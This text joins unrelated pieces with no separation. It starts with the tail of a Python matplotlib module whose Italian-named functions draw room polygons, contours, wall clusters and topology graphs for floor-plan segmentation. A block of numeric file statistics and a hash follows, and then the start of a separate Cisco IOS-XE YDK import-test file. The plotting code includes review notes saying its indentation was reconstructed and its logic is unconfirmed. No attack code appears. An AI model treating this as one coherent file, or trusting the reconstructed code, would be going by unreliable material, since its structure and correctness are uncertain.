        plt.savefig(savename,bbox_inches='tight')
    else :
        plt.show()
    return (colori_assegnati, fig, ax)
def disegna_sovrapposizione_predizione(spazi_iniziali, spazi_predetti, contours , colori, xmin, ymin, xmax, ymax, savefig = True, format='pdf', filepath = '.', savename = '17_sovrapposizione_di_tutto', title = False):
    '''
    Draw the initial rooms, the contour and the predicted rooms, all overlaid.
    Returns (figure, axes).

    NOTE(review): indentation was lost in this copy of the file and has been
    reconstructed from the code's logic — verify against the upstream source.
    '''
    fig, ax = setup_plot()
    savename = os.path.join(filepath, savename+'.'+format)
    if title :
        ax.set_title('17_sovrapposizione_di_tutto')
    # predicted rooms: only inside+partial spaces are drawn (translucent grey);
    # the branches for the other space kinds were disabled in the original
    for index,s in enumerate(spazi_predetti):
        if s.out == False and s.parziale == True:
            f_patch = PolygonPatch(s.spazio,fc='#C0C0C0',ec='BLACK',alpha = 0.5)
            ax.add_patch(f_patch)
            ax.set_xlim(xmin,xmax)
            ax.set_ylim(ymin,ymax)
            ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str(str(s.cluster_frontiera)),fontsize=8)
    # initial rooms: coloured when inside, white when out, grey when partial
    for index,s in enumerate(spazi_iniziali):
        if s.out == False and s.parziale == False:
            f_patch = PolygonPatch(s.spazio,fc=colori[index],ec='BLACK')
            ax.add_patch(f_patch)
            ax.set_xlim(xmin,xmax)
            ax.set_ylim(ymin,ymax)
        elif s.out == True:
            f_patch = PolygonPatch(s.spazio,fc='white',ec='BLACK')
            ax.add_patch(f_patch)
            ax.set_xlim(xmin,xmax)
            ax.set_ylim(ymin,ymax)
        elif s.out == False and s.parziale == True:
            f_patch = PolygonPatch(s.spazio,fc='gray',ec='BLACK')
            ax.add_patch(f_patch)
            ax.set_xlim(xmin,xmax)
            ax.set_ylim(ymin,ymax)
            ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str(str(s.cluster_frontiera)),fontsize=8)
    # external contour as a grey polyline
    ascisse = []
    ordinate = []
    for c1 in contours:
        ascisse.append(c1[0][0])
        ordinate.append(c1[0][1])
    ax.plot(ascisse,ordinate,color='0.8',linewidth=3.0)
    del ascisse[:]
    del ordinate[:]
    if savefig :
        plt.savefig(savename,bbox_inches='tight')
    else :
        plt.show()
    return (fig, ax)
def disegna_stanze(stanze, colori, xmin, ymin, xmax, ymax, savefig=True, format='pdf', filepath='.', savename='8_Stanze', title=False):
    """Draw the room layout as filled polygons; returns (figure, axes)."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('7.stanze')
    for indice, stanza in enumerate(stanze):
        ax.add_patch(PolygonPatch(stanza, fc=colori[indice], ec='BLACK'))
    ax.set_xlim(xmin, xmax)
    ax.set_ylim(ymin, ymax)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
    return (fig, ax)
def disegna_poligoni_interni_esterni(celle_poligoni, out_poligoni, parz_poligoni, xmin, ymin, xmax, ymax, savefig=True, format='pdf', filepath='.', savename='8_b_poligoni_in_ed_out', title=False):
    """Draw internal and partial cells in orange and external cells in white.

    Returns (figure, axes).
    """
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('7.poli_in_out')
    for poligono in celle_poligoni:
        ax.add_patch(PolygonPatch(poligono, fc='orange', ec='BLACK'))
    for poligono in parz_poligoni:
        ax.add_patch(PolygonPatch(poligono, fc='orange', ec='BLACK'))
    for poligono in out_poligoni:
        ax.add_patch(PolygonPatch(poligono, fc='#FFFFFF', ec='BLACK'))
    ax.set_xlim(xmin, xmax)
    ax.set_ylim(ymin, ymax)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
    return (fig, ax)
def disegna_spazi(spazi,colori, xmin, ymin, xmax, ymax, savefig = True, format='pdf', filepath = '.', savename = '8_Stanze', title = False):
    '''
    Draw the room layout: coloured patches for inside rooms, white for rooms
    marked out (labelled "out"), grey for partial rooms (labelled with their
    frontier cluster). Borders touching the image boundary are highlighted in
    red. Returns (figure, axes).

    NOTE(review): indentation was lost in this copy of the file. The cells
    loop is placed at the per-space level (running for every space) — confirm
    against the upstream source whether it belongs inside the last elif.
    '''
    fig, ax = setup_plot()
    savename = os.path.join(filepath, savename+'.'+format)
    if title :
        ax.set_title('8.stanze')
    for index,s in enumerate(spazi):
        if s.out == False and s.parziale == False:
            f_patch = PolygonPatch(s.spazio,fc=colori[index],ec='BLACK')
            ax.add_patch(f_patch)
            ax.set_xlim(xmin,xmax)
            ax.set_ylim(ymin,ymax)
        elif s.out == True:
            f_patch = PolygonPatch(s.spazio,fc='white',ec='BLACK')
            ax.add_patch(f_patch)
            ax.set_xlim(xmin,xmax)
            ax.set_ylim(ymin,ymax)
            ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str("out"),fontsize=8)
        elif s.out == False and s.parziale == True:
            f_patch = PolygonPatch(s.spazio,fc='gray',ec='BLACK')
            ax.add_patch(f_patch)
            ax.set_xlim(xmin,xmax)
            ax.set_ylim(ymin,ymax)
            ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str(str(s.cluster_frontiera)),fontsize=8)
        # highlight the borders of a room that touch the image boundary
        # (this signals that the prediction cannot continue in that direction)
        for cellette in s.cells:
            bordi = cellette.c.bordi
            ascisse = []
            ordinate = []
            for b in bordi:
                if b.cluster_spaziale == 'bordo1' or b.cluster_spaziale == 'bordo2' or b.cluster_spaziale == 'bordo3' or b.cluster_spaziale == 'bordo4':
                    # the border lies on one of the extended boundary segments
                    x1 = b.x1
                    x2 = b.x2
                    y1 = b.y1
                    y2 = b.y2
                    ascisse.extend((x1,x2))
                    ordinate.extend((y1,y2))
                    ax.plot(ascisse,ordinate, color='r',linewidth=2)
                    del ascisse[:]
                    del ordinate[:]
    if savefig :
        plt.savefig(savename,bbox_inches='tight')
    else :
        plt.show()
    return (fig, ax)
def disegna_spazi_con_pareti_nascoste(spazi,colori, xmin, ymin, xmax, ymax,edges, savefig = True, format='pdf', filepath = '.', savename = '8_Stanze', title = False):
    '''
    Like disegna_spazi, but additionally draws the heavy edges (weight >= 0.3)
    as thin black walls on top of the layout. Returns (figure, axes).

    NOTE(review): indentation was lost in this copy of the file. The cells
    loop is placed at the per-space level (running for every space) — confirm
    against the upstream source whether it belongs inside the last elif.
    '''
    fig, ax = setup_plot()
    savename = os.path.join(filepath, savename+'.'+format)
    if title :
        ax.set_title('8.stanze')
    for index,s in enumerate(spazi):
        if s.out == False and s.parziale == False:
            f_patch = PolygonPatch(s.spazio,fc=colori[index],ec='BLACK')
            ax.add_patch(f_patch)
            ax.set_xlim(xmin,xmax)
            ax.set_ylim(ymin,ymax)
        elif s.out == True:
            f_patch = PolygonPatch(s.spazio,fc='white',ec='BLACK')
            ax.add_patch(f_patch)
            ax.set_xlim(xmin,xmax)
            ax.set_ylim(ymin,ymax)
            ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str("out"),fontsize=8)
        elif s.out == False and s.parziale == True:
            f_patch = PolygonPatch(s.spazio,fc='gray',ec='BLACK')
            ax.add_patch(f_patch)
            ax.set_xlim(xmin,xmax)
            ax.set_ylim(ymin,ymax)
            ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str(str(s.cluster_frontiera)),fontsize=8)
        # highlight the borders of a room that touch the image boundary
        # (this signals that the prediction cannot continue in that direction)
        for cellette in s.cells:
            bordi = cellette.c.bordi
            ascisse = []
            ordinate = []
            for b in bordi:
                if b.cluster_spaziale == 'bordo1' or b.cluster_spaziale == 'bordo2' or b.cluster_spaziale == 'bordo3' or b.cluster_spaziale == 'bordo4':
                    # the border lies on one of the extended boundary segments
                    x1 = b.x1
                    x2 = b.x2
                    y1 = b.y1
                    y2 = b.y2
                    ascisse.extend((x1,x2))
                    ordinate.extend((y1,y2))
                    ax.plot(ascisse,ordinate, color='r',linewidth=2)
                    del ascisse[:]
                    del ordinate[:]
    # heavy edges drawn as thin black walls, one plot call per edge
    ascisse = []
    ordinate = []
    for edge in edges:
        if (edge.weight>=0.3):
            ascisse.append(edge.x1)
            ascisse.append(edge.x2)
            ordinate.append(edge.y1)
            ordinate.append(edge.y2)
            ax.plot(ascisse,ordinate, color='k', linewidth=1.0)
            del ascisse[:]
            del ordinate[:]
    if savefig :
        plt.savefig(savename,bbox_inches='tight')
    else :
        plt.show()
    return (fig, ax)
def disegna_contorno(vertici, xmin, ymin, xmax, ymax, savefig=True, format='pdf', filepath='.', savename='4_Contorno', title=False):
    """Draw the external contour of the metric map as a filled orange path."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    percorso = mplPath.Path(vertici)
    ax.add_patch(patches.PathPatch(percorso, facecolor='orange', lw=2))
    ax.set_xlim(xmin - 1, xmax + 1)
    ax.set_ylim(ymin - 1, ymax + 1)
    if title:
        ax.set_title('4.contorno esterno')
    if savefig:
        # note: saved without bbox_inches='tight', as in the original
        plt.savefig(out_path)
    else:
        plt.show()
# def disegna_contorno(vertici,xmin,ymin,xmax,ymax):
# print vertici
# bbPath = mplPath.Path(vertici)
# fig = plt.figure()
# ax = fig.add_subplot(111)
# patch = patches.PathPatch(bbPath, facecolor='orange', lw=2)
# ax.add_patch(patch)
# ax.set_xlim(xmin-1,xmax+1)
# ax.set_ylim(ymin-1,ymax+1)
# plt.show()
def disegna_contorno_e_centro_frontiera(vertici, lista_centri, xmin, ymin, xmax, ymax, savefig=True, format='pdf', filepath='.', savename='4_Contorno', title=False):
    """Draw the external contour plus the frontier centres as red dots."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    ax.add_patch(patches.PathPatch(mplPath.Path(vertici), facecolor='orange', lw=2))
    # frontier centres (note: the centres are stored flipped)
    xs = [centro[0] for centro in lista_centri]
    ys = [centro[1] for centro in lista_centri]
    ax.plot(xs, ys, 'ro')
    ax.set_xlim(xmin - 1, xmax + 1)
    ax.set_ylim(ymin - 1, ymax + 1)
    if title:
        ax.set_title('4.contorno esterno')
    if savefig:
        # note: saved without bbox_inches='tight', as in the original
        plt.savefig(out_path)
    else:
        plt.show()
def disegna_contorno_e_area_vista(vertici, cerchio, xmin, ymin, xmax, ymax, savefig=True, format='pdf', filepath='.', savename='4_Contorno', title=False):
    """Draw the contour plus the circular area that could be observed next (translucent grey)."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    ax.add_patch(patches.PathPatch(mplPath.Path(vertici), facecolor='orange', lw=2))
    # candidate visible area, drawn behind (zorder=1) and translucent
    ax.add_patch(PolygonPatch(cerchio, fc='gray', ec='BLACK', alpha=0.2, zorder=1))
    ax.set_xlim(xmin - 1, xmax + 1)
    ax.set_ylim(ymin - 1, ymax + 1)
    if title:
        ax.set_title('4.contorno esterno')
    if savefig:
        # note: saved without bbox_inches='tight', as in the original
        plt.savefig(out_path)
    else:
        plt.show()
def disegna_contorno_e_retta_frontiera(vertici, line, xmin, ymin, xmax, ymax, savefig=True, format='pdf', filepath='.', savename='4_Contorno', title=False):
    """Draw the external contour plus the frontier line (blue)."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    ax.add_patch(patches.PathPatch(mplPath.Path(vertici), facecolor='orange', lw=2))
    xs, ys = line.xy
    ax.plot(xs, ys, color='#6699cc', alpha=0.7, linewidth=3, solid_capstyle='round', zorder=2)
    ax.set_xlim(xmin - 1, xmax + 1)
    ax.set_ylim(ymin - 1, ymax + 1)
    if title:
        ax.set_title('4.contorno esterno')
    if savefig:
        # note: saved without bbox_inches='tight', as in the original
        plt.savefig(out_path)
    else:
        plt.show()
def disegna_cluster_angolari(lista_muri, cluster_angolari, savefig=True, format='pdf', filepath='.', savename='5b_Contorno', title=False):
    """For each angular cluster, draw its member walls in red and all the others in green.

    Note: as in the original, every wall is re-drawn once per cluster iteration,
    so the colours visible at the end correspond to the last cluster processed.
    """
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('cluster angolari')
    for cluster in set(cluster_angolari):
        for muro in lista_muri:
            colore = 'r' if muro.cluster_angolare == cluster else 'g'
            ax.plot([muro.x1, muro.x2], [muro.y1, muro.y2], color=colore, linewidth=2.0)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_cluster_angolari_corretto(lista_muri, cluster_angolari, savefig=True, format='pdf', filepath='.', savename='5b_cluster_angolare', title=False):
    """Draw walls coloured by angular cluster: one colormap colour per cluster.

    Clusters are visited in a random order so colour assignment varies per call.
    """
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    n_colori = len(set(cluster_angolari))
    norma = colors.Normalize(vmin=0, vmax=n_colori)
    mappa = cmx.ScalarMappable(norm=norma, cmap=plt.get_cmap("nipy_spectral"))
    if title:
        ax.set_title('cluster angolari')
    for indice, cluster in enumerate(np.random.permutation(list(set(cluster_angolari)))):
        colore = colors.rgb2hex(mappa.to_rgba(indice))
        for muro in lista_muri:
            if muro.cluster_angolare == cluster:
                ax.plot([muro.x1, muro.x2], [muro.y1, muro.y2], color=colore, linewidth=2.0)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegno_mura_segmenti_stanze(stanze, colori, xmin, ymin, xmax, ymax, cluster_spaziali, lista_muri, savefig=True, format='pdf', filepath='.', savename='14_tutto', title=False):
    """Draw the walls coloured by spatial cluster with the room polygons on top."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    n_colori = len(set(cluster_spaziali))
    norma = colors.Normalize(vmin=0, vmax=n_colori)
    mappa = cmx.ScalarMappable(norm=norma, cmap=plt.get_cmap("nipy_spectral"))
    if title:
        ax.set_title('4.spatial clusters')
    # walls, one colormap colour per spatial cluster (random cluster order)
    for indice, cluster in enumerate(np.random.permutation(list(set(cluster_spaziali)))):
        colore = colors.rgb2hex(mappa.to_rgba(indice))
        for muro in lista_muri:
            if muro.cluster_spaziale == cluster:
                ax.plot([muro.x1, muro.x2], [muro.y1, muro.y2], color=colore, linewidth=2.0)
    # room polygons
    for indice, stanza in enumerate(stanze):
        ax.add_patch(PolygonPatch(stanza, fc=colori[indice], ec='BLACK'))
    ax.set_xlim(xmin, xmax)
    ax.set_ylim(ymin, ymax)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_pareti(edges, savefig=True, format='pdf', filepath='.', savename='14_paretis', title=False):
    """Draw the heavy wall edges (weight >= 0.3) as thick black segments.

    Fixes vs. original: removed a duplicated, dead re-initialisation of the
    coordinate lists. *title* is accepted for interface compatibility but was
    never used by the original either.
    """
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    for edge in edges:
        if edge.weight >= 0.3:  # threshold kept from original (was 0.3)
            ax.plot([edge.x1, edge.x2], [edge.y1, edge.y2], color='k', linewidth=4.0)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_cluster_spaziali(cluster_spaziali, lista_muri, savefig=True, format='pdf', filepath='.', savename='5_MURA', title=False):
    """Draw walls coloured by spatial cluster: one colormap colour per cluster.

    Clusters are visited in a random order so colour assignment varies per call.
    """
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    n_colori = len(set(cluster_spaziali))
    norma = colors.Normalize(vmin=0, vmax=n_colori)
    mappa = cmx.ScalarMappable(norm=norma, cmap=plt.get_cmap("nipy_spectral"))
    if title:
        ax.set_title('4.spatial clusters')
    for indice, cluster in enumerate(np.random.permutation(list(set(cluster_spaziali)))):
        colore = colors.rgb2hex(mappa.to_rgba(indice))
        for muro in lista_muri:
            if muro.cluster_spaziale == cluster:
                ax.plot([muro.x1, muro.x2], [muro.y1, muro.y2], color=colore, linewidth=2.0)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_extended_segments(extended_segments, lista_muri, savefig=True, format='pdf', filepath='.', savename='7_Extended', title=False):
    """Draw the walls of *lista_muri* in black and the extended segments in red.

    Fix vs. original: ``plt.ax.set_title(...)`` raised AttributeError whenever
    ``title=True`` (pyplot has no ``ax`` attribute); the title is now set on the
    axes returned by setup_plot().
    """
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('7.extended segments')  # bug fix: was plt.ax.set_title
    for e in lista_muri:
        ax.plot([e.x1, e.x2], [e.y1, e.y2], color='k', linewidth=3.0)
    for e in extended_segments:
        ax.plot([e.x1, e.x2], [e.y1, e.y2], color='r', linewidth=1.5)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_extended_segments_e_contorno(vertici, xmin, ymin, xmax, ymax, extended_segments, savefig=True, format='pdf', filepath='.', savename='7_Extended_cotorno', title=False):
    """Draw the extended segments in red over the filled external contour.

    Fix vs. original: ``plt.ax.set_title(...)`` raised AttributeError whenever
    ``title=True`` (pyplot has no ``ax`` attribute); the title is now set on the
    axes returned by setup_plot().
    """
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('7.extended segments contorno')  # bug fix: was plt.ax.set_title
    for e in extended_segments:
        ax.plot([e.x1, e.x2], [e.y1, e.y2], color='r', linewidth=1.5)
    # filled external contour
    bbPath = mplPath.Path(vertici)
    ax.add_patch(patches.PathPatch(bbPath, facecolor='#DDDDDD', lw=2))
    ax.set_xlim(xmin - 1, xmax + 1)
    ax.set_ylim(ymin - 1, ymax + 1)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_distance_transform(distanceMap, savefig=True, format='pdf', filepath='.', savename='10_distance_transform', title=False):
    """Render a precomputed distance-transform map."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        plt.title('10_distance_transform')
    plt.imshow(distanceMap)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
# TODO: delete this function, it is not used for anything.
def disegna_distance_transform_e_stanze(distanceMap, stanze, colori, savefig=True, format='pdf', filepath='.', savename='10b_distance_and_stanze', title=False):
    """Render the distance-transform map with the room polygons drawn on top."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        plt.title('10b_distance_and_stanze')
    plt.imshow(distanceMap)
    for indice, stanza in enumerate(stanze):
        ax.add_patch(PolygonPatch(stanza, fc=colori[indice], ec='BLACK'))
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_medial_axis(points, b3, savefig=True, format='png', filepath='.', savename='11_medial_axis', title=False):
    """Plot the medial-axis points as dots over the binary image *b3*."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        plt.title('11_medial_axis')
    # assumes points is an (N, 2) array of x/y coordinates — TODO confirm
    ax.plot(points[:, 0], points[:, 1], '.')
    ax.imshow(b3, cmap='Greys')
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def plot_nodi_e_stanze(colori, estremi, G, pos, stanze, stanze_collegate, savefig=True, format='pdf', filepath='.', savename='16_grafo_topologico', title=False):
    """Draw the rooms with the topological-graph nodes and labels on top.

    Graph edges are drawn manually as dotted lines between representative
    points of connected rooms, because nx.draw_networkx_edges output was not
    visible (likely hidden by the polygons, per the original's note).
    """
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    xmin, xmax = estremi[0], estremi[1]
    ymin, ymax = estremi[2], estremi[3]
    if title:
        plt.title('12_grafo_topologico')
    for indice, stanza in enumerate(stanze):
        ax.add_patch(PolygonPatch(stanza, fc=colori[indice], ec='BLACK'))
    ax.set_xlim(xmin, xmax)
    ax.set_ylim(ymin, ymax)
    # graph nodes and labels
    nx.draw_networkx_nodes(G, pos, node_color='w')
    nx.draw_networkx_labels(G, pos)
    # dotted connections between linked rooms
    for coppia in stanze_collegate:
        p1 = stanze[coppia[0]].representative_point()
        p2 = stanze[coppia[1]].representative_point()
        plt.plot([p1.x, p2.x], [p1.y, p2.y], color='k', ls='dotted', lw=0.5)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_cluster_mura(cluster_mura, lista_muri, savefig=True, format='pdf', filepath='.', savename='5d_cluster_muri', title=False):
    """Draw walls coloured by wall cluster: one colormap colour per cluster.

    Clusters are visited in a random order so colour assignment varies per call.
    """
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    n_colori = len(set(cluster_mura))
    norma = colors.Normalize(vmin=0, vmax=n_colori)
    mappa = cmx.ScalarMappable(norm=norma, cmap=plt.get_cmap("nipy_spectral"))
    if title:
        ax.set_title('4.spatial clusters')
    for indice, cluster in enumerate(np.random.permutation(list(set(cluster_mura)))):
        colore = colors.rgb2hex(mappa.to_rgba(indice))
        for muro in lista_muri:
            if muro.cluster_muro == cluster:
                ax.plot([muro.x1, muro.x2], [muro.y1, muro.y2], color=colore, linewidth=2.0)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
| 29.492815
| 368
| 0.683319
| 5,198
| 34,890
| 4.485187
| 0.088688
| 0.018873
| 0.024063
| 0.019816
| 0.814575
| 0.808742
| 0.788325
| 0.774856
| 0.753624
| 0.743888
| 0
| 0.027669
| 0.154743
| 34,890
| 1,183
| 369
| 29.492815
| 0.762877
| 0.092577
| 0
| 0.789014
| 0
| 0
| 0.058558
| 0.005824
| 0
| 0
| 0
| 0.002536
| 0
| 0
| null | null | 0
| 0.021223
| null | null | 0.001248
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a66d26c199f89f7d4221b203f292e6d7e8e9f93
| 94,740
|
py
|
Python
|
cisco-ios-xe/ydk/models/cisco_ios_xe/test/import_tests.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xe/ydk/models/cisco_ios_xe/test/import_tests.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xe/ydk/models/cisco_ios_xe/test/import_tests.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
import unittest
class ImportTest(unittest.TestCase):
def test_ATM_FORUM_TC_MIB(self):
from ydk.models.cisco_ios_xe.ATM_FORUM_TC_MIB import TruthValue
from ydk.models.cisco_ios_xe.ATM_FORUM_TC_MIB import AtmServiceCategory
def test_ATM_MIB(self):
from ydk.models.cisco_ios_xe.ATM_MIB import ATMMIB
def test_ATM_TC_MIB(self):
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmNoTrafficDescriptor
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmNoClpNoScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpNoTaggingNoScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpTaggingNoScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmNoClpScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpNoTaggingScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpTaggingScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpNoTaggingMcr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpTransparentNoScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpTransparentScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmNoClpTaggingNoScr
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmNoClpNoScrCdvt
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmNoClpScrCdvt
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpNoTaggingScrCdvt
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmClpTaggingScrCdvt
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmConnCastType
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmConnKind
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmInterfaceType
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmServiceCategory
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmVorXAdminStatus
from ydk.models.cisco_ios_xe.ATM_TC_MIB import AtmVorXOperStatus
def test_BGP4_MIB(self):
from ydk.models.cisco_ios_xe.BGP4_MIB import BGP4MIB
def test_BRIDGE_MIB(self):
from ydk.models.cisco_ios_xe.BRIDGE_MIB import BRIDGEMIB
def test_CISCO_AAA_SERVER_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_AAA_SERVER_MIB import CiscoAAAProtocol
from ydk.models.cisco_ios_xe.CISCO_AAA_SERVER_MIB import CISCOAAASERVERMIB
def test_CISCO_AAA_SESSION_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_AAA_SESSION_MIB import CISCOAAASESSIONMIB
def test_CISCO_AAL5_MIB(self):
pass
def test_CISCO_ATM_EXT_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ATM_EXT_MIB import OamCCStatus
from ydk.models.cisco_ios_xe.CISCO_ATM_EXT_MIB import OamCCVcState
def test_CISCO_ATM_PVCTRAP_EXTN_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ATM_PVCTRAP_EXTN_MIB import CatmOAMRecoveryType
from ydk.models.cisco_ios_xe.CISCO_ATM_PVCTRAP_EXTN_MIB import CatmOAMFailureType
from ydk.models.cisco_ios_xe.CISCO_ATM_PVCTRAP_EXTN_MIB import CISCOATMPVCTRAPEXTNMIB
def test_CISCO_ATM_QOS_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_ATM_QOS_MIB import VcParamConfigLocation
from ydk.models.cisco_ios_xe.CISCO_ATM_QOS_MIB import VpState
from ydk.models.cisco_ios_xe.CISCO_ATM_QOS_MIB import CISCOATMQOSMIB
def test_CISCO_BGP4_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_BGP4_MIB import CbgpSafi
from ydk.models.cisco_ios_xe.CISCO_BGP4_MIB import CISCOBGP4MIB
def test_CISCO_BGP_POLICY_ACCOUNTING_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_BGP_POLICY_ACCOUNTING_MIB import CISCOBGPPOLICYACCOUNTINGMIB
def test_CISCO_BULK_FILE_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_BULK_FILE_MIB import CISCOBULKFILEMIB
def test_CISCO_CABLE_SPECTRUM_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CABLE_SPECTRUM_MIB import CCSRequestOperation
from ydk.models.cisco_ios_xe.CISCO_CABLE_SPECTRUM_MIB import CCSRequestOperState
from ydk.models.cisco_ios_xe.CISCO_CABLE_SPECTRUM_MIB import CISCOCABLESPECTRUMMIB
def test_CISCO_CABLE_WIDEBAND_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CABLE_WIDEBAND_MIB import CISCOCABLEWIDEBANDMIB
def test_CISCO_CBP_TARGET_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CBP_TARGET_MIB import CISCOCBPTARGETMIB
def test_CISCO_CBP_TARGET_TC_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CBP_TARGET_TC_MIB import CcbptTargetType
from ydk.models.cisco_ios_xe.CISCO_CBP_TARGET_TC_MIB import CcbptTargetDirection
from ydk.models.cisco_ios_xe.CISCO_CBP_TARGET_TC_MIB import CcbptPolicySourceType
def test_CISCO_CBP_TC_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CBP_TC_MIB import CbpExecutionStrategy
def test_CISCO_CDP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CDP_MIB import CISCOCDPMIB
def test_CISCO_CEF_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CEF_MIB import CISCOCEFMIB
def test_CISCO_CEF_TC(self):
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefIpVersion
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefAdjLinkType
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefPathType
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefPrefixSearchState
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefForwardingElementSpecialType
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefAdminStatus
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefOperStatus
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefFailureReason
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefCCType
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefCCAction
from ydk.models.cisco_ios_xe.CISCO_CEF_TC import CefCCStatus
def test_CISCO_CONFIG_COPY_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_CONFIG_COPY_MIB import ConfigCopyProtocol
from ydk.models.cisco_ios_xe.CISCO_CONFIG_COPY_MIB import ConfigCopyState
